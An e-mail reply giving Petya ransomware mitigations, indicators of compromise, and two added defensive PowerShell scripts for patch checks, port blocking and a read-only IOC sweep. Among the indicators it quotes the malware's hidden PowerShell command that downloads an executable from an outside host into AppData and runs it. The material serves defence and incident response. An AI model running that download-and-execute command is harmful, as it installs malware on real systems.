Hello, for what needs to be done you can look at the following.

Source: https://www.cyberbit.com/endpoint-security/petya-ransomware/

What you should do

1. Patch Microsoft Office to prevent infection via Microsoft Word attachments: install the CVE-2017-0199 update
   <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>
   to patch the Microsoft Office/WordPad Remote Code Execution Vulnerability.
2. Patch Windows workstations: if you have not done so after the WannaCry attack, install the SMBv1 patch
   <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> now in order to prevent the attack from spreading.
3. Use GPO to block the SMB & WMI protocols (TCP 135, 445, 1024-1035) as an additional safety measure preventing the EternalBlue exploit.
4. Disable shutdown via command line: disable the option to use "cmd /k shutdown -a". This command is used by the malware to initially shut down the computer, after which the computer will boot from the new malware boot loader.
5. Disable file execution in AppData and Temp paths: disable the option to run .exe files in the paths %AppData% and %Temp%.
6.
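The following PowerShell is an added example, not code from Cyberbit or from the original e-mail, that turns steps 2, 3 and 5 of the list above into per-host checks and settings. It assumes an elevated PowerShell on Windows 8.1 / Server 2012 R2 or later; the KB numbers are quoted from memory and must be checked against the MS17-010 bulletin for the OS in question, and the firewall rule name is an assumption.

```powershell
# Added example (not from Cyberbit or the original e-mail): per-host checks and
# settings corresponding to steps 2, 3 and 5 above. Run in an elevated PowerShell
# on Windows 8.1 / Server 2012 R2 or later. KB numbers are from memory and must be
# verified against the MS17-010 bulletin for the OS in question; the firewall rule
# name is an assumption.

# Step 2: is MS17-010 installed? (KB list assumed; check the bulletin for your OS)
$ms17010Kbs = @('KB4012212', 'KB4012215', 'KB4012213', 'KB4012214', 'KB4012598')
$installed = Get-HotFix | Where-Object { $_.HotFixID -in $ms17010Kbs }
if ($installed) {
    Write-Host "MS17-010 present: $($installed.HotFixID -join ', ')"
} else {
    Write-Warning "No MS17-010 KB found on this host. Install it first."
}

# Step 2 (defence in depth): turn off the SMBv1 server protocol entirely.
if ((Get-SmbServerConfiguration).EnableSMB1Protocol) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Write-Host 'SMBv1 server protocol disabled.'
}

# Step 3: the page recommends a GPO; a local firewall rule is the per-host
# equivalent. Block inbound TCP 135, 445 and 1024-1035 (the ports listed above).
$ruleName = 'Petya mitigation - block SMB/WMI inbound'   # assumed name
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
        -LocalPort @('135', '445', '1024-1035') -Action Block -Profile Any | Out-Null
    Write-Host "Firewall rule '$ruleName' created."
}

# Step 5: Software Restriction Policies are normally pushed through GPO
# (Computer Configuration > Windows Settings > Security Settings >
# Software Restriction Policies). This part only reports whether a Disallowed
# (level 0) path rule already covers %AppData% or %Temp%, so you can see what
# is still missing on this host.
$srpRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths'
$covered = @()
if (Test-Path $srpRoot) {
    Get-ChildItem $srpRoot | ForEach-Object {
        $item = (Get-ItemProperty $_.PSPath).ItemData
        if ($item -match 'AppData|Temp') { $covered += $item }
    }
}
if ($covered) {
    Write-Host "Disallowed SRP path rules found: $($covered -join '; ')"
} else {
    Write-Warning 'No Disallowed SRP path rule for %AppData%/%Temp% on this host.'
}
```

The list above aims the port block at workstations; applying the same inbound 445 block to a file server cuts off its SMB shares, so scope the rule (or the GPO) accordingly.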
IOCs:

Files:

File Name: Order-20062017.doc
  MD5:       415FE69BF32634CA98FA07633F4118E1
  SHA-1:     101CC1CB56C407D5B9149F2C3B8523350D23BA84
  SHA-256:   FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
  File Size: 6215 bytes
  File Type: Rich Text Format data

File Name: myguy.xls
  MD5:       0487382A4DAF8EB9660F1C67E30F8B25
  SHA-1:     736752744122A0B5EE4B95DDAD634DD225DC0F73
  SHA-256:   EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
  File Size: 13893 bytes
  File Type: Zip archive data

File Name: BCA9D6.exe
  MD5:       A1D5895F85751DFE67D19CCCB51B051A
  SHA-1:     9288FB8E96D419586FC8C595DD95353D48E8A060
  SHA-256:   17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
  File Size: 275968 bytes

IPs (as given in the source, with three octets each):
  141.115.108
  165.29.78
  200.16.242
  90.139.247

Processes:

mshta.exe       "%WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" (PID: 2324)
powershell.exe  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe'); (PID: 2588, Additional Context: (System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe'))
10807.exe       "%APPDATA%\10807.exe" (PID: 3096)

On Jun 28, 2017 9:24 AM, "Kayhan Yüksel" <[email protected]> wrote:
> Hello
>
> Could you recommend a source that lists the systems and versions affected by
> the Petya ransomware, the vulnerabilities it exploits to spread, and the
> measures needed to block it?
> Thanks, have a good day
>
> Kayhan Yüksel
>
>
> -------------------------------------------------
> Sinara Labs. E-Mail Threat Simulation
>
> ets.sinaralabs.com
>
> -------------------------------------------------
>
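As an added example, not part of the original e-mail or its source, the PowerShell below does a read-only sweep of one host for the indicators in the IOC list above: it hashes files in the directories where the listed files were observed and looks for the mshta.exe / hidden PowerShell command lines. The hashes, file names, the download host and the %APPDATA%\10807.exe path come from the list; the directories searched, the rule that only those directories are checked, and the output format are assumptions.

```powershell
# Added example (not from the original e-mail or its source): read-only sweep of
# one host for the Petya indicators listed above. Hashes, names, the download
# host and the dropped-file path come from the IOC list; the search directories
# and the output format are assumptions. Run as an administrator to see all
# processes' command lines.

# SHA-256 values from the IOC list, mapped to the file name they belong to.
$iocSha256 = @{
    'FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206' = 'Order-20062017.doc'
    'EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6' = 'myguy.xls'
    '17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD' = 'BCA9D6.exe'
}
# File names from the IOC list and the process list (C:\myguy.xls.hta, %APPDATA%\10807.exe).
$iocNames = @('Order-20062017.doc', 'myguy.xls', 'myguy.xls.hta', 'BCA9D6.exe', '10807.exe')

# Where the listed files were observed (assumed; extend as needed). Non-recursive.
$searchDirs = @($env:APPDATA, $env:TEMP, 'C:\')
$findings = New-Object System.Collections.Generic.List[object]

foreach ($dir in $searchDirs) {
    Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $reasons = @()
        if ($iocNames -contains $_.Name) { $reasons += 'name' }
        # Get-FileHash returns upper-case hex, matching the keys above.
        $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($hash -and $iocSha256.ContainsKey($hash)) { $reasons += "sha256=$($iocSha256[$hash])" }
        if ($reasons) {
            $findings.Add([pscustomobject]@{ Type = 'File'; Where = $_.FullName; Why = ($reasons -join ',') })
        }
    }
}

# Process indicators from the list: mshta.exe launching C:\myguy.xls.hta, the
# hidden PowerShell downloader fetching myguy.exe from french-cooking.com into
# %APPDATA%\10807.exe, and 10807.exe itself.
$procPattern = 'myguy\.xls\.hta|french-cooking\.com|10807\.exe'
Get-CimInstance Win32_Process |
    Where-Object { $_.Name -in @('mshta.exe', 'powershell.exe', '10807.exe') -and $_.CommandLine -match $procPattern } |
    ForEach-Object {
        $findings.Add([pscustomobject]@{ Type = 'Process'; Where = "$($_.Name) (PID $($_.ProcessId))"; Why = $_.CommandLine })
    }

if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize -Wrap
} else {
    Write-Host 'No listed Petya indicators found on this host.'
}
```

A hit on a name alone (for example a file called myguy.xls) is weaker than a hash match, which is why both reasons are reported separately; the hash of the downloaded 10807.exe is not in the list, so that file can only be matched by name or by its running process.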
-------------------------------------------------
Sinara Labs. E-Mail Threat Simulation

ets.sinaralabs.com
-------------------------------------------------
